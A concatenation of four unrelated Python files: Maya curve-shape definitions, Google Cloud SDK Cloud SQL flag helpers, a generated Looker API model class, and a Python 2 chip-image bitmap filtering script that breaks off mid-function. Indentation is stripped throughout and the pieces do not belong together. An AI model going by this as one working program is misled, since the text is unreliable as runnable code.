(-0.4, 0.0, -0.4), (-0.6, 0.0, -0.4), (-0.8, 0.0, -0.4), (-1.0, 0.0, -0.4),
(-1.2, 0.0, -0.4), (-1.2, 0.0, -0.6), (-1.2, 0.0, -0.8), (-1.4, 0.0, -0.6),
(-1.6, 0.0, -0.4), (-1.8, 0.0, -0.2), (-2.0, 0.0, 0.0), (-1.8, 0.0, 0.2), (-1.6, 0.0, 0.4),
(-1.4, 0.0, 0.6), (-1.2, 0.0, 0.8), (-1.2, 0.0, 0.4), (-1.0, 0.0, 0.4), (-0.8, 0.0, 0.4),
(-0.6, 0.0, 0.4), (-0.4, 0.0, 0.4), (-0.4, 0.0, 0.6), (-0.4, 0.0, 0.8), (-0.4, 0.0, 1.0),
(-0.4, 0.0, 1.2), (-0.8, 0.0, 1.2), (-0.6, 0.0, 1.4), (-0.4, 0.0, 1.6), (-0.2, 0.0, 1.8),
(0.0, 0.0, 2.0), (0.2, 0.0, 1.8), (0.4, 0.0, 1.6), (0.6, 0.0, 1.4), (0.8, 0.0, 1.2),
(0.4, 0.0, 1.2), (0.4, 0.0, 1.0), (0.4, 0.0, 0.8), (0.4, 0.0, 0.6), (0.4, 0.0, 0.4),
(0.6, 0.0, 0.4), (0.8, 0.0, 0.4), (1.0, 0.0, 0.4), (1.2, 0.0, 0.4), (1.2, 0.0, 0.8),
(1.4, 0.0, 0.6), (1.6, 0.0, 0.4), (1.8, 0.0, 0.2), (2.0, 0.0, 0.0), (1.8, 0.0, -0.2),
(1.6, 0.0, -0.4), (1.4, 0.0, -0.6), (1.2, 0.0, -0.8), (1.2, 0.0, -0.6), (1.2, 0.0, -0.4),
(1.0, 0.0, -0.4), (0.8, 0.0, -0.4), (0.6, 0.0, -0.4)],
'master_move': [
(0.4, -0.1, -0.4), (0.4, -0.1, -0.6), (0.4, 0.0, -0.8), (0.4, 0.1, -1.0), (0.4, 0.1, -1.2),
(0.8, 0.1, -1.2), (0.6, 0.1, -1.4), (0.4, 0.1, -1.6), (0.2, 0.1, -1.8), (0, 0.1, -2.0),
(-0.2, 0.1, -1.8), (-0.4, 0.1, -1.6), (-0.6, 0.1, -1.4), (-0.8, 0.1, -1.2),
(-0.4, 0.1, -1.2), (-0.4, 0.1, -1.0), (-0.4, 0.0, -0.8), (-0.4, -0.1, -0.6),
(-0.4, -0.1, -0.4), (-0.6, -0.1, -0.4), (-0.8, 0.0, -0.4), (-1.0, 0.1, -0.4),
(-1.2, 0.1, -0.4), (-1.2, 0.1, -0.6), (-1.2, 0.1, -0.8), (-1.4, 0.1, -0.6),
(-1.6, 0.1, -0.4), (-1.8, 0.1, -0.2), (-2.0, 0.1, 0), (-1.8, 0.1, 0.2), (-1.6, 0.1, 0.4),
(-1.4, 0.1, 0.6), (-1.2, 0.1, 0.8), (-1.2, 0.1, 0.4), (-1.0, 0.1, 0.4), (-0.8, 0.0, 0.4),
(-0.6, -0.1, 0.4), (-0.4, -0.1, 0.4), (-0.4, -0.1, 0.6), (-0.4, 0.0, 0.8), (-0.4, 0.1, 1.0),
(-0.4, 0.1, 1.2), (-0.8, 0.1, 1.2), (-0.6, 0.1, 1.4), (-0.4, 0.1, 1.6), (-0.2, 0.1, 1.8),
(0, 0.1, 2.0), (0.2, 0.1, 1.8), (0.4, 0.1, 1.6), (0.6, 0.1, 1.4), (0.8, 0.1, 1.2),
(0.4, 0.1, 1.2), (0.4, 0.1, 1.0), (0.4, 0.0, 0.8), (0.4, -0.1, 0.6), (0.4, -0.1, 0.4),
(0.6, -0.1, 0.4), (0.8, 0.0, 0.4), (1.0, 0.1, 0.4), (1.2, 0.1, 0.4), (1.2, 0.1, 0.8),
(1.4, 0.1, 0.6), (1.6, 0.1, 0.4), (1.8, 0.1, 0.2), (2.0, 0.1, 0), (1.8, 0.1, -0.2),
(1.6, 0.1, -0.4), (1.4, 0.1, -0.6), (1.2, 0.1, -0.8), (1.2, 0.1, -0.6), (1.2, 0.1, -0.4),
(1.0, 0.1, -0.4), (0.8, 0.0, -0.4), (0.6, -0.1, -0.4)],
'arrow': [
(0, 0, 0), (2, 0, 2), (1, 0, 2), (1, 0, 3), (1, 0, 4), (1, 0, 5), (1, 0, 6), (1, 0, 7),
(1, 0, 8), (0, 0, 8), (-1, 0, 8), (-1, 0, 7), (-1, 0, 6), (-1, 0, 5), (-1, 0, 4),
(-1, 0, 3), (-1, 0, 2), (-2, 0, 2)],
'plus': [
(-1, 0, -1), (-1, 0, -3), (1, 0, -3), (1, 0, -1), (3, 0, -1), (3, 0, 1), (1, 0, 1),
(1, 0, 3), (-1, 0, 3), (-1, 0, 1), (-3, 0, 1), (-3, 0, -1)],
'ring': [
(0.707107, 0.1, 0.707107), (1, 0.1, 0), (1, -0.1, 0), (0.707107, -0.1, -0.707107),
(0.707107, 0.1, -0.707107), (0, 0.1, -1), (0, -0.1, -1), (-0.707107, -0.1, -0.707107),
(-0.707107, 0.1, -0.707107), (-1, 0.1, 0), (-1, -0.1, 0), (-0.707107, -0.1, 0.707107),
(-0.707107, 0.1, 0.707107), (0, 0.1, 1), (0, -0.1, 1), (0.707107, -0.1, 0.707107),
(0.707107, 0.1, 0.707107), (0, 0.1, 1), (0, -0.1, 1), (-0.707107, -0.1, 0.707107),
(-0.707107, 0.1, 0.707107), (-1, 0.1, 0), (-1, -0.1, 0), (-0.707107, -0.1, -0.707107),
(-0.707107, 0.1, -0.707107), (0, 0.1, -1), (0, -0.1, -1), (0.707107, -0.1, -0.707107),
(0.707107, 0.1, -0.707107), (1, 0.1, 0), (1, -0.1, 0), (0.707107, -0.1, 0.707107)],
'double_arrow': [
(1, 0, 0), (1, 0, -1), (1, 0, -2), (1, 0, -3), (2, 0, -3), (1, 0, -4), (0, 0, -5),
(-1, 0, -4), (-2, 0, -3), (-1, 0, -3), (-1, 0, -2), (-1, 0, -1), (-1, 0, 0), (-1, 0, 1),
(-1, 0, 2), (-1, 0, 3), (-2, 0, 3), (-1, 0, 4), (0, 0, 5), (1, 0, 4), (2, 0, 3), (1, 0, 3),
(1, 0, 2), (1, 0, 1)],
'half_circle': [
(0, 0, -1), (-0.10447515585510377, 0, -1), (-0.3132852867940712, 0, -0.9635267637659666),
(-0.5943487937195443, 0, -0.8183627562953246),
(-0.8231292854416953, 0, -0.5980921804260191),
(-0.9658174718568318, 0, -0.3136661981440106), (-1, 0, 0),
(-0.9658174718568332, 0, 0.3136661981440098), (-0.8231292854416946, 0, 0.598092180426019),
(-0.5943487937195449, 0, 0.8183627562953251), (-0.31328528679407086, 0, 0.9635267637659651),
(-0.10447515585510486, 0, 1), (0, 0, 1)],
'tesseract': [
(0.866025, 0.866025, 0.866025), (-0.866025, 0.866025, 0.866025), (-0.5, 0.5, 0.5),
(0.5, 0.5, 0.5), (0.866025, 0.866025, 0.866025), (0.866025, -0.866025, 0.866025),
(0.5, -0.5, 0.5), (0.5, 0.5, 0.5), (0.5, 0.5, -0.5), (0.866025, 0.866025, -0.866025),
(0.866025, 0.866025, 0.866025), (0.866025, -0.866025, 0.866025),
(0.866025, -0.866025, -0.866025), (0.866025, 0.866025, -0.866025), (0.5, 0.5, -0.5),
(0.5, -0.5, -0.5), (0.866025, -0.866025, -0.866025), (-0.866025, -0.866025, -0.866025),
(-0.866025, 0.866025, -0.866025), (-0.5, 0.5, -0.5), (-0.5, -0.5, -0.5),
(-0.866025, -0.866025, -0.866025), (-0.866025, -0.866025, 0.866025),
(-0.866025, 0.866025, 0.866025), (-0.5, 0.5, 0.5), (-0.5, -0.5, 0.5),
(-0.866025, -0.866025, 0.866025), (0.866025, -0.866025, 0.866025), (0.5, -0.5, 0.5),
(0.5, -0.5, -0.5), (-0.5, -0.5, -0.5), (-0.5, -0.5, 0.5), (0.5, -0.5, 0.5), (0.5, 0.5, 0.5),
(-0.5, 0.5, 0.5), (-0.5, 0.5, -0.5), (0.5, 0.5, -0.5), (0.866025, 0.866025, -0.866025),
(-0.866025, 0.866025, -0.866025), (-0.866025, 0.866025, 0.866025)]
}
RGB_DICTIONARY = {
'red': [1, 0, 0],
'pink': [1, .5, .5],
'orange': [1, .4, 0],
'yellow': [1, 1, 0],
'green': [0, 1, 0],
'cyan': [0, 1, 1],
'blue': [0, 0, 1],
'magenta': [1, 0, 1],
'purple': [1, 0, 1],
'white': [1, 1, 1],
'grey': [.6, .6, .6]
}
# Index colors are blown out by comparison, so these values are more correct
RGB_ACTUALS = {
'red': [8.509607315063477, -0.010916219092905521, -0.010916219092905521],
'pink': [8.509607315063477, 0.5029946565628052, 0.5029946565628052],
'orange': [1.270400047302246, 0.33289995789527893, -0.010800041258335114],
'yellow': [8.509607315063477, 8.509607315063477, -0.010916219092905521],
'green': [-0.010916219092905521, 8.509607315063477, -0.010916219092905521],
'cyan': [0.14030349254608154, 1.1826233863830566, 8.509607315063477],
'blue': [-0.010916219092905521, -0.010916219092905521, 8.509607315063477],
'magenta': [0.770842432975769, -0.010916443541646004, 0.770842432975769],
'purple': [0.770842432975769, -0.010916443541646004, 0.770842432975769],
'white': [8.509607315063477, 8.509607315063477, 8.509607315063477],
'grey': [.9, .9, .9]
}
CURVE_LIBRARY_BOOL = {
'circle': False,
'square': True,
'triangle': True,
'octagon': False,
'box': False,
'sphere': False,
'pyramid': False, # might be True
'diamond': False, # might be True
'quad_arrow': True,
'arrow': True,
'plus': True,
'ring': True,
'double_arrow': True,
'half_circle': False,
'tesseract': False,
'rounded_square': False,
'master_move': True,
}
def control_sphere(*arg):
circle_1 = cmds.circle(nr=[0, 1, 0], r=1, d=3, ch=0)[0]
circle_2 = cmds.circle(nr=[1, 0, 0], r=1, d=3, ch=0)[0]
circle_3 = cmds.circle(nr=[0, 0, 1], r=1, d=3, ch=0)[0]
cmds.parent(
cmds.listRelatives(circle_2, circle_3, shapes=True),
circle_1,
shape=True,
relative=True)
cmds.delete(circle_2, circle_3)
cmds.select(circle_1)
return circle_1
def rounded_square(*arg):
circle = cmds.circle(
normal=[0, 1, 0],
radius=1,
degree=3,
sections=16,
constructionHistory=False)[0]
square_points = [
(0, 0, -1.0), (-0.4, 0, -1.0), (-1.0, 0.0, -1.0), (-1.0, 0, -0.4), (-1.0, 0, 0),
(-1.0, 0, 0.4), (-1.0, 0.0, 1.0), (-0.4, 0, 1.0), (0, 0, 1.0), (0.4, 0, 1.0),
(1.0, 0.0, 1.0), (1.0, 0, 0.4), (1.0, 0, 0), (1.0, 0, -0.4), (1.0, 0, -1.0), (0.4, 0, -1.0)]
for i, pnt in enumerate(square_points):
cmds.setAttr(circle + '.cv[{}]'.format(i), *pnt)
return circle
|
<filename>lib/googlecloudsdk/command_lib/database_migration/connection_profiles/cloudsql_flags.py
# -*- coding: utf-8 -*- #
# Copyright 2020 Google LLC. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Flags and helpers for the connection profiles cloudsql related commands."""
from __future__ import absolute_import
from __future__ import division
from __future__ import unicode_literals
from googlecloudsdk.calliope import arg_parsers
_IP_ADDRESS_PART = r'(25[0-5]|2[0-4][0-9]|1?[0-9]{1,2})' # Match decimal 0-255
_CIDR_PREFIX_PART = r'([0-9]|[1-2][0-9]|3[0-2])' # Match decimal 0-32
# Matches either IPv4 range in CIDR notation or a naked IPv4 address.
_CIDR_REGEX = r'{addr_part}(\.{addr_part}){{3}}(\/{prefix_part})?$'.format(
addr_part=_IP_ADDRESS_PART, prefix_part=_CIDR_PREFIX_PART)
def AddDatabaseVersionFlag(parser):
"""Adds a --database-version flag to the given parser."""
help_text = """\
Database engine type and version (MYSQL_5_7, MYSQL_5_6, MYSQL_8_0,
POSTGRES_9_6, POSTGRES_10, POSTGRES_11, POSTGRES_12, POSTGRES_13).
"""
choices = [
'MYSQL_5_7', 'MYSQL_5_6', 'MYSQL_8_0', 'POSTGRES_9_6', 'POSTGRES_10',
'POSTGRES_11', 'POSTGRES_12', 'POSTGRES_13'
]
parser.add_argument(
'--database-version', help=help_text, choices=choices, required=True)
def AddUserLabelsFlag(parser):
"""Adds a --user-labels flag to the given parser."""
help_text = """\
The resource labels for a Cloud SQL instance to use to annotate any related
underlying resources such as Compute Engine VMs. An object containing a list
of "key": "value" pairs.
"""
parser.add_argument('--user-labels',
metavar='KEY=VALUE',
type=arg_parsers.ArgDict(),
help=help_text)
def AddTierFlag(parser):
"""Adds a --tier flag to the given parser."""
help_text = """\
Tier (or machine type) for this instance, for example: ``db-n1-standard-1''
(MySQL instances) of ``db-custom-1-3840'' (PostgreSQL instances). For more
information, see
[Cloud SQL Instance Settings](https://cloud.google.com/sql/docs/mysql/instance-settings).
"""
parser.add_argument('--tier', help=help_text, required=True)
def AddStorageAutoResizeLimitFlag(parser):
"""Adds a --storage-auto-resize-limit flag to the given parser."""
help_text = """\
Maximum size to which storage capacity can be automatically increased. The
default value is 0, which specifies that there is no limit.
"""
parser.add_argument('--storage-auto-resize-limit', type=int, help=help_text)
def AddActivationPolicylag(parser):
"""Adds a --activation-policy flag to the given parser."""
help_text = """\
Activation policy specifies when the instance is activated; it is
applicable only when the instance state is 'RUNNABLE'. Valid values:
ALWAYS: The instance is on, and remains so even in the absence of
connection requests.
NEVER: The instance is off; it is not activated, even if a connection
request arrives.
"""
choices = ['ALWAYS', 'NEVER']
parser.add_argument('--activation-policy', help=help_text, choices=choices)
def AddEnableIpv4Flag(parser):
"""Adds a --enable-ip-v4 flag to the given parser."""
help_text = 'Whether the instance should be assigned an IPv4 address or not.'
parser.add_argument('--enable-ip-v4', type=bool, help=help_text)
def AddPrivateNetworkFlag(parser):
"""Adds a --private-network flag to the given parser."""
help_text = """\
Resource link for the VPC network from which the Cloud SQL instance is
accessible for private IP. For example,
/projects/myProject/global/networks/default. This setting can be updated,
but it cannot be removed after it is set.
"""
parser.add_argument('--private-network', help=help_text)
def AddRequireSslFlag(parser):
"""Adds a --require-ssl flag to the given parser."""
help_text = 'Whether SSL connections over IP should be enforced or not.'
parser.add_argument('--require-ssl', type=bool, help=help_text)
def AddAuthorizedNetworksFlag(parser):
"""Adds a `--authorized-networks` flag."""
cidr_validator = arg_parsers.RegexpValidator(
_CIDR_REGEX, ('Must be specified in CIDR notation, also known as '
'\'slash\' notation (e.g. 192.168.100.0/24).'))
help_text = """\
List of external networks that are allowed to connect to the instance using
the IP. See https://en.wikipedia.org/wiki/CIDR_notation#CIDR_notation, also
known as 'slash' notation (e.g.192.168.100.0/24).
"""
parser.add_argument(
'--authorized-networks',
type=arg_parsers.ArgList(min_length=1, element_type=cidr_validator),
metavar='NETWORK',
default=[],
help=help_text)
def AddAutoStorageIncreaseFlag(parser):
"""Adds a --auto-storage-increase flag to the given parser."""
help_text = """\
If you enable this setting, Cloud SQL checks your available storage every
30 seconds. If the available storage falls below a threshold size, Cloud
SQL automatically adds additional storage capacity. If the available
storage repeatedly falls below the threshold size, Cloud SQL continues to
add storage until it reaches the maximum of 30 TB. Default: ON.
"""
parser.add_argument('--auto-storage-increase', type=bool, help=help_text)
def AddDatabaseFlagsFlag(parser):
"""Adds a --database-flags flag to the given parser."""
help_text = """\
Database flags passed to the Cloud SQL instance at startup. An object
containing a list of "key": value pairs. Example: { "name": "wrench",
"mass": "1.3kg", "count": "3" }.
"""
parser.add_argument('--database-flags',
type=arg_parsers.ArgDict(),
metavar='KEY=VALUE',
help=help_text)
def AddDataDiskTypeFlag(parser):
"""Adds a --data-disk-type flag to the given parser."""
help_text = 'Type of storage: PD_SSD (default) or PD_HDD.'
choices = ['PD_SSD', 'PD_HDD']
parser.add_argument('--data-disk-type', help=help_text, choices=choices)
def AddDataDiskSizeFlag(parser):
"""Adds a --data-disk-size flag to the given parser."""
help_text = """\
Storage capacity available to the database, in GB. The minimum (and
default) size is 10GB.
"""
parser.add_argument('--data-disk-size', type=int, help=help_text)
def AddZoneFlag(parser):
"""Adds a --zone flag to the given parser."""
help_text = """\
Google Cloud Platform zone where your Cloud SQL datdabse instance is
located.
"""
parser.add_argument('--zone', help=help_text)
|
# coding: utf-8
"""
Experimental Looker API 3.1 Preview
This API 3.1 is in active development. Breaking changes are likely to occur to some API functions in future Looker releases until API 3.1 is officially launched and upgraded to beta status. If you have time and interest to experiment with new or modified services exposed in this embryonic API 3.1, we welcome your participation and feedback! For large development efforts or critical line-of-business projects, we strongly recommend you stick with the API 3.0 while API 3.1 is under construction. # noqa: E501
OpenAPI spec version: 3.1.0
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class UserAttributeWithValue(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'name': 'str',
'label': 'str',
'rank': 'int',
'value': 'str',
'user_id': 'int',
'user_can_edit': 'bool',
'value_is_hidden': 'bool',
'user_attribute_id': 'int',
'source': 'str',
'can': 'dict(str, bool)'
}
attribute_map = {
'name': 'name',
'label': 'label',
'rank': 'rank',
'value': 'value',
'user_id': 'user_id',
'user_can_edit': 'user_can_edit',
'value_is_hidden': 'value_is_hidden',
'user_attribute_id': 'user_attribute_id',
'source': 'source',
'can': 'can'
}
def __init__(self, name=None, label=None, rank=None, value=None, user_id=None, user_can_edit=None, value_is_hidden=None, user_attribute_id=None, source=None, can=None): # noqa: E501
"""UserAttributeWithValue - a model defined in Swagger""" # noqa: E501
self._name = None
self._label = None
self._rank = None
self._value = None
self._user_id = None
self._user_can_edit = None
self._value_is_hidden = None
self._user_attribute_id = None
self._source = None
self._can = None
self.discriminator = None
if name is not None:
self.name = name
if label is not None:
self.label = label
if rank is not None:
self.rank = rank
if value is not None:
self.value = value
if user_id is not None:
self.user_id = user_id
if user_can_edit is not None:
self.user_can_edit = user_can_edit
if value_is_hidden is not None:
self.value_is_hidden = value_is_hidden
if user_attribute_id is not None:
self.user_attribute_id = user_attribute_id
if source is not None:
self.source = source
if can is not None:
self.can = can
@property
def name(self):
"""Gets the name of this UserAttributeWithValue. # noqa: E501
Name of user attribute # noqa: E501
:return: The name of this UserAttributeWithValue. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UserAttributeWithValue.
Name of user attribute # noqa: E501
:param name: The name of this UserAttributeWithValue. # noqa: E501
:type: str
"""
self._name = name
@property
def label(self):
"""Gets the label of this UserAttributeWithValue. # noqa: E501
Human-friendly label for user attribute # noqa: E501
:return: The label of this UserAttributeWithValue. # noqa: E501
:rtype: str
"""
return self._label
@label.setter
def label(self, label):
"""Sets the label of this UserAttributeWithValue.
Human-friendly label for user attribute # noqa: E501
:param label: The label of this UserAttributeWithValue. # noqa: E501
:type: str
"""
self._label = label
@property
def rank(self):
"""Gets the rank of this UserAttributeWithValue. # noqa: E501
Precedence for setting value on user (lowest wins) # noqa: E501
:return: The rank of this UserAttributeWithValue. # noqa: E501
:rtype: int
"""
return self._rank
@rank.setter
def rank(self, rank):
"""Sets the rank of this UserAttributeWithValue.
Precedence for setting value on user (lowest wins) # noqa: E501
:param rank: The rank of this UserAttributeWithValue. # noqa: E501
:type: int
"""
self._rank = rank
@property
def value(self):
"""Gets the value of this UserAttributeWithValue. # noqa: E501
Value of attribute for user # noqa: E501
:return: The value of this UserAttributeWithValue. # noqa: E501
:rtype: str
"""
return self._value
@value.setter
def value(self, value):
"""Sets the value of this UserAttributeWithValue.
Value of attribute for user # noqa: E501
:param value: The value of this UserAttributeWithValue. # noqa: E501
:type: str
"""
self._value = value
@property
def user_id(self):
"""Gets the user_id of this UserAttributeWithValue. # noqa: E501
Id of User # noqa: E501
:return: The user_id of this UserAttributeWithValue. # noqa: E501
:rtype: int
"""
return self._user_id
@user_id.setter
def user_id(self, user_id):
"""Sets the user_id of this UserAttributeWithValue.
Id of User # noqa: E501
:param user_id: The user_id of this UserAttributeWithValue. # noqa: E501
:type: int
"""
self._user_id = user_id
@property
def user_can_edit(self):
"""Gets the user_can_edit of this UserAttributeWithValue. # noqa: E501
Can the user set this value # noqa: E501
:return: The user_can_edit of this UserAttributeWithValue. # noqa: E501
:rtype: bool
"""
return self._user_can_edit
@user_can_edit.setter
def user_can_edit(self, user_can_edit):
"""Sets the user_can_edit of this UserAttributeWithValue.
Can the user set this value # noqa: E501
:param user_can_edit: The user_can_edit of this UserAttributeWithValue. # noqa: E501
:type: bool
"""
self._user_can_edit = user_can_edit
@property
def value_is_hidden(self):
"""Gets the value_is_hidden of this UserAttributeWithValue. # noqa: E501
If true, the \"value\" field will be null, because the attribute settings block access to this value # noqa: E501
:return: The value_is_hidden of this UserAttributeWithValue. # noqa: E501
:rtype: bool
"""
return self._value_is_hidden
@value_is_hidden.setter
def value_is_hidden(self, value_is_hidden):
"""Sets the value_is_hidden of this UserAttributeWithValue.
If true, the \"value\" field will be null, because the attribute settings block access to this value # noqa: E501
:param value_is_hidden: The value_is_hidden of this UserAttributeWithValue. # noqa: E501
:type: bool
"""
self._value_is_hidden = value_is_hidden
@property
def user_attribute_id(self):
"""Gets the user_attribute_id of this UserAttributeWithValue. # noqa: E501
Id of User Attribute # noqa: E501
:return: The user_attribute_id of this UserAttributeWithValue. # noqa: E501
:rtype: int
"""
return self._user_attribute_id
@user_attribute_id.setter
def user_attribute_id(self, user_attribute_id):
"""Sets the user_attribute_id of this UserAttributeWithValue.
Id of User Attribute # noqa: E501
:param user_attribute_id: The user_attribute_id of this UserAttributeWithValue. # noqa: E501
:type: int
"""
self._user_attribute_id = user_attribute_id
@property
def source(self):
"""Gets the source of this UserAttributeWithValue. # noqa: E501
How user got this value for this attribute # noqa: E501
:return: The source of this UserAttributeWithValue. # noqa: E501
:rtype: str
"""
return self._source
@source.setter
def source(self, source):
"""Sets the source of this UserAttributeWithValue.
How user got this value for this attribute # noqa: E501
:param source: The source of this UserAttributeWithValue. # noqa: E501
:type: str
"""
self._source = source
@property
def can(self):
"""Gets the can of this UserAttributeWithValue. # noqa: E501
Operations the current user is able to perform on this object # noqa: E501
:return: The can of this UserAttributeWithValue. # noqa: E501
:rtype: dict(str, bool)
"""
return self._can
@can.setter
def can(self, can):
"""Sets the can of this UserAttributeWithValue.
Operations the current user is able to perform on this object # noqa: E501
:param can: The can of this UserAttributeWithValue. # noqa: E501
:type: dict(str, bool)
"""
self._can = can
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UserAttributeWithValue):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
|
<gh_stars>10-100
from PIL import Image, ImageDraw, ImageStat
states = 'vmu'
bitmap2fill = {
'v':'white',
'm':'blue',
'u':'orange',
}
bitmap2fill2 = {
'v': (255, 255, 255, 255),
'm': (0, 0, 255, 255),
'u': (255, 165, 0, 255),
}
fill2bitmap = {
(255, 255, 255):'v', # white
(0, 0, 255): 'm', # blue
(255, 165, 0): 'u', # orange
}
# confocal bitmap
class CFB:
def __init__(self):
# 0: cols, 1: rows
self.crs = [None, None]
# linear grid equations on the original image
self.xy_mb = [None, None]
self.bitmap = None
def cr(self, adj=0):
for c in xrange(self.crs[0] + adj):
for r in xrange(self.crs[1] + adj):
yield (c, r)
def xy(self, adj=0):
'''Generate (x0, y0) upper left and (x1, y1) lower right (inclusive) tile coordinates'''
for c in xrange(self.crs[0] + adj):
(xm, xb) = self.xy_mb[0]
x = int(xm * c + xb)
for r in xrange(self.crs[1] + adj):
(ym, yb) = self.xy_mb[1]
y = int(ym * r + yb)
yield (x, y), (x + xm, y + ym)
def xy_cr(self, b=True, adj=0, sf=1.0):
for c in xrange(self.crs[0] + adj):
(xm, xb) = self.xy_mb[0]
if not b:
xb = 0.0
x = int(xm * c + xb)
for r in xrange(self.crs[1] + adj):
(ym, yb) = self.xy_mb[1]
if not b:
yb = 0.0
y = int(ym * r + yb)
yield ((int(x * sf), int(y * sf)), (int(int(x + xm) * sf), int(int(y + ym) * sf))), (c, r)
def xy2cr(self, x, y, sf = 1.0):
x = x / sf
y = y / sf
m, b = self.xy_mb[0]
c = int((x - b) / m)
m, b = self.xy_mb[1]
r = int((y - b) / m)
if c > self.crs[0]:
raise ValueError("max col %d, got %d => %d" % (self.crs[0], x, c))
if r > self.crs[1]:
raise ValueError("max row %d, got %d => %d" % (self.crs[1], y, r))
return (c, r)
# Save in enlarged form
# Colors are made to be easy to see
# and may contain annotations
# Not intended to be read back
def cfb_save_debug(cfb, fn):
#im = self.preproc_im.copy()
im = Image.new("RGB", (int(cfb.crs[0] * cfb.xy_mb[0][0]), int(cfb.crs[1] * cfb.xy_mb[1][0])), "white")
draw = ImageDraw.Draw(im)
for ((x0, y0), (x1, y1)), (c, r) in cfb.xy_cr(False):
draw.rectangle((x0, y0, x1, y1), fill=bitmap2fill[cfb.bitmap[(c, r)]])
im.save(fn)
# Save in minimal interchange format with one pixel per lambda
def cfb_save(cfb, fn):
im = Image.new("RGB", cfb.crs, "white")
draw = ImageDraw.Draw(im)
for (c, r) in cfb.cr():
draw.rectangle((c, r, c, r), fill=bitmap2fill[cfb.bitmap[(c, r)]])
im.save(fn)
def cfb_verify(cfb):
for (c, r) in cfb.bitmap:
if c >= cfb.crs[0] or r >= cfb.crs[1]:
raise Exception("Got c=%d, r=%d w/ global cs=%d, rs=%d" % (c, r, cfb.crs[0], cfb.crs[1]))
def filt_unk_lone(bitmap, unk_open):
for c, r in set(unk_open):
# look for adjacent
if (bitmap.get((c - 1, r), 'v') == 'v' and bitmap.get((c + 1, r), 'v') == 'v' and
bitmap.get((c, r - 1), 'v') == 'v' and bitmap.get((c, r + 1), 'v') == 'v'):
print ' Unknown %dc, %dr rm: lone' % (c, r)
bitmap[(c, r)] = 'v'
unk_open.discard((c, r))
def bitmap_netstat(bitmap, c, r, keep=lambda x: x in 'mu'):
'''
return dictionary with m and u keys
each key holds a set with the cols and rows contiguous with start point c, r (including c, r)
This could potentially blow through the stack for large polygons
If problems optimize
TODO: abort when find certain metal threshold?
'''
ret = {'m': set(), 'u': set()}
checked = set()
def check(c, r):
#print 'check(%d, %d)' % (c, r)
if (c, r) in checked:
return
this = bitmap.get((c, r), None)
# Out of bounds?
if this is None:
return
checked.add((c, r))
# Void? We are off the polygon: stop looking
if not keep(this):
return
# got something
ret[this].add((c, r))
check(c - 1, r)
check(c + 1, r)
check(c, r - 1)
check(c, r + 1)
check(c, r)
return ret
def trans_group(bitmap, c, r, to):
'''Convert all same type tiles at c, r into to'''
this = bitmap[(c, r)]
bins = bitmap_netstat(bitmap, c, r, keep=lambda x: x in this)
for (cm, rm) in bins[this]:
bitmap[(cm, rm)] = to
'''
Remove any segments that are composed of only unknown and 0-1 positive matches
'''
def filt_unk_groups(cfb, unk_open):
to_remove = set()
checked = set()
for c, r in set(unk_open):
if (c, r) in checked:
continue
bins = bitmap_netstat(cfb.bitmap, c, r)
checked = checked.union(bins['u'])
def has_border_m():
if len(bins['m']) == 0:
return False
for (cm, rm) in bins['m']:
if cm <= 2 or cm >= cfb.crs[0] - 2 or \
rm <= 2 or rm >= cfb.crs[1] - 2:
return True
return False
if len(bins['m']) <= 1:
# if there's metal at a border keep it
# tries to level out penalties for not being able to linearize these
# keeping as warnings instead of removing
# xxx: should just keep the unknown near the border?
if has_border_m():
continue
print ' Unknown %dc, %dr rm: %d unknowns, %d metal' % (c, r, len(bins['u']), len(bins['m']))
to_remove = to_remove.union(bins['u'])
to_remove = to_remove.union(bins['m'])
for cr in to_remove:
cfb.bitmap[cr] = 'v'
unk_open.discard(cr)
def prop_ag(cfb, bitmap_ag, unk_open):
to_promote = set()
for c, r in cfb.cr():
# Skip if nothing is there
if bitmap_ag[(c, r)] == 'v':
continue
# Do we already think something is there?
if cfb.bitmap[(c, r)] == 'm':
continue
# Is there something to extend?
if not has_around(cfb.bitmap, c, r, 'm', order=2):
continue
print ' %dc, %dr => m: join m' % (c, r)
to_promote.add((c, r))
for (c, r) in to_promote:
cfb.bitmap[(c, r)] = 'm'
unk_open.discard((c, r))
'''
def has_around(bitmap, c, r, t, d='v', order=1):
return (bitmap.get((c - 1, r), d) != t and
bitmap.get((c + 1, r), d) != t and
bitmap.get((c, r - 1), d) != t and
bitmap.get((c, r + 1), d) != t)
'''
def has_around(bitmap, c, r, t, d='v', order=1):
'''Return true if d exists for order tiles in at least one direction around c, r'''
# the four directions
for cr in [
lambda i: (c - i, r),
lambda i: (c + i, r),
lambda i: (c, r - i),
lambda i: (c, r + i),
]:
def check():
# order tiles this direction match?
for i in xrange(order + 1):
if bitmap.get(cr(i), d) != t:
return False
return True
# this direction has a match?
if check():
return True
# No direction matched
return False
'''
If a single unknown is on a contiguous strip of metal its likely a via has distorted it
Note: this will ocassionally cause garbage to incorrectly merge nets
'''
def munge_unk_cont(bitmap, unk_open):
# Don't propagate
# Make a list and apply it after the sweep
to_promote = set()
